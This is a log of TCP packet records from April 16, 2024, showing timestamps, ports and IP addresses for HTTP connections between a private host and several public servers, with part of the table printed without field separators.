Apr 16, 2024 17:16:36.627003908 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.627007961 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.627019882 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.627029896 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.627032042 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.627051115 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.627067089 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:37.031279087 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031303883 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031316042 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031327963 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031342983 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031352997 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031367064 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031379938 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031394005 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.031407118 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031419992 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031430960 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031434059 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031443119 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031455994 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031469107 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031481981 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031483889 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031493902 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031507015 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031518936 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031527996 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031529903 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031542063 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031544924 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031553030 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031563997 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031574965 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031575918 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031588078 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031599045 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031599998 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031610012 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031620979 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031630039 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031632900 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031646013 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031652927 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031656027 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031670094 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031682014 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031692982 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031694889 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031707048 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031719923 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031730890 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031732082 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031744003 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031754971 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031759024 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031766891 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031780005 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031791925 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031795025 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031804085 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031816006 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031826019 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031827927 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031838894 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031851053 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031857967 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031862020 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031874895 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031886101 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031898022 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031908989 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031909943 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031920910 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031933069 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031944990 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031955004 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.031955957 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031968117 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031979084 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031990051 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.031990051 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.032001019 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.032011986 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.032021999 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.032033920 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.032040119 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.032046080 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.032082081 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.032114983 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435197115 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435237885 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435250044 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435261011 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435272932 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435280085 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435285091 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435297012 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435307026 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435309887 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435322046 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435333014 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435338020 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435344934 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435357094 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435369015 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435380936 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435384035 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435384035 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435391903 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435403109 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435405016 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435415983 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435419083 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435426950 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435437918 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435437918 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435450077 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435461998 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435472965 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435475111 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435484886 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435497046 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435502052 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435508013 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435518980 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435519934 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435529947 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435533047 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435540915 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435553074 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435560942 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435564995 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435576916 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435585976 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435589075 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435600042 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435606003 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435611963 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435622931 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435633898 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435636044 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435646057 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435651064 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435657978 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435668945 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435678959 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435681105 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435692072 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435703993 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435707092 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435715914 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435719967 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435728073 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435739040 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.435750008 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.435775995 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436197042 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436209917 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436220884 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436232090 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436244011 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436249018 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436255932 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436268091 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436280012 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436284065 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436290979 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436302900 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436311960 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436315060 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436326981 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436327934 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436341047 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436355114 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436356068 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436366081 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436367035 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436378956 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436387062 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436391115 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436403036 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436404943 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436414003 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436425924 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436431885 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436438084 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436449051 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436453104 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436460972 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436470985 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436474085 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436486006 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436487913 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436499119 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436511040 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436511993 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436523914 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436536074 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436536074 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436547995 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436552048 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436558962 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436569929 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436582088 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436582088 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436593056 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436604977 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436610937 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436616898 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436626911 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436629057 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436640978 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436651945 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436655998 CEST4973680192.168.2.4103.14.155.180
                                                                      Apr 16, 2024 17:16:37.436664104 CEST8049736103.14.155.180192.168.2.4
                                                                      Apr 16, 2024 17:16:37.436674118 CEST4973680192.168.2.4103.14.155.180
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 16, 2024 17:16:37.436676025 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.436686993 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:37.436700106 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:37.436719894 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:37.436728001 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:49.017483950 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:59.917114973 CEST | 49738 | 80 | 192.168.2.4 | 112.175.50.218
Apr 16, 2024 17:17:00.193988085 CEST | 80 | 49738 | 112.175.50.218 | 192.168.2.4
Apr 16, 2024 17:17:00.194097996 CEST | 49738 | 80 | 192.168.2.4 | 112.175.50.218
Apr 16, 2024 17:17:00.197278976 CEST | 49738 | 80 | 192.168.2.4 | 112.175.50.218
Apr 16, 2024 17:17:00.474103928 CEST | 80 | 49738 | 112.175.50.218 | 192.168.2.4
Apr 16, 2024 17:17:00.489064932 CEST | 80 | 49738 | 112.175.50.218 | 192.168.2.4
Apr 16, 2024 17:17:00.489125967 CEST | 80 | 49738 | 112.175.50.218 | 192.168.2.4
Apr 16, 2024 17:17:00.489165068 CEST | 80 | 49738 | 112.175.50.218 | 192.168.2.4
Apr 16, 2024 17:17:00.489404917 CEST | 49738 | 80 | 192.168.2.4 | 112.175.50.218
Apr 16, 2024 17:17:00.493386030 CEST | 49738 | 80 | 192.168.2.4 | 112.175.50.218
Apr 16, 2024 17:17:00.770222902 CEST | 80 | 49738 | 112.175.50.218 | 192.168.2.4
Apr 16, 2024 17:17:15.771245956 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:15.981947899 CEST | 80 | 49739 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:15.982264996 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:15.983711004 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:16.194446087 CEST | 80 | 49739 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:16.198116064 CEST | 80 | 49739 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:16.198160887 CEST | 80 | 49739 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:16.198218107 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:17.489871979 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:18.507746935 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:18.717463970 CEST | 80 | 49740 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:18.717614889 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:18.719245911 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:18.928879023 CEST | 80 | 49740 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:18.935375929 CEST | 80 | 49740 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:18.935420990 CEST | 80 | 49740 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:18.935480118 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:20.224356890 CEST | 49740 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:21.242192030 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:21.451378107 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.451559067 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:21.453392029 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:21.662210941 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.662270069 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.662305117 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.662342072 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.662374973 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.662408113 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.670352936 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.670383930 CEST | 80 | 49741 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:21.670438051 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:22.960127115 CEST | 49741 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:23.976474047 CEST | 49742 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:24.187040091 CEST | 80 | 49742 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:24.190548897 CEST | 49742 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:24.191987991 CEST | 49742 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:24.402314901 CEST | 80 | 49742 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:24.407860041 CEST | 80 | 49742 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:24.408507109 CEST | 80 | 49742 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:24.409671068 CEST | 49742 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:24.410193920 CEST | 49742 | 80 | 192.168.2.4 | 217.160.0.183
Apr 16, 2024 17:17:24.620297909 CEST | 80 | 49742 | 217.160.0.183 | 192.168.2.4
Apr 16, 2024 17:17:30.018153906 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:30.314887047 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:30.315141916 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:30.316589117 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:30.611979961 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:30.649054050 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280350924 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280390024 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280411959 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280421019 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280430079 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280438900 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280448914 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280457973 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280466080 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.280474901 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.282444000 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.579418898 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579483032 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579521894 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579559088 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579598904 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579634905 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579659939 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.579674959 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579694033 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.579715014 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579752922 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579767942 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.579792023 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579828978 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579844952 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.579869032 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.579921007 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
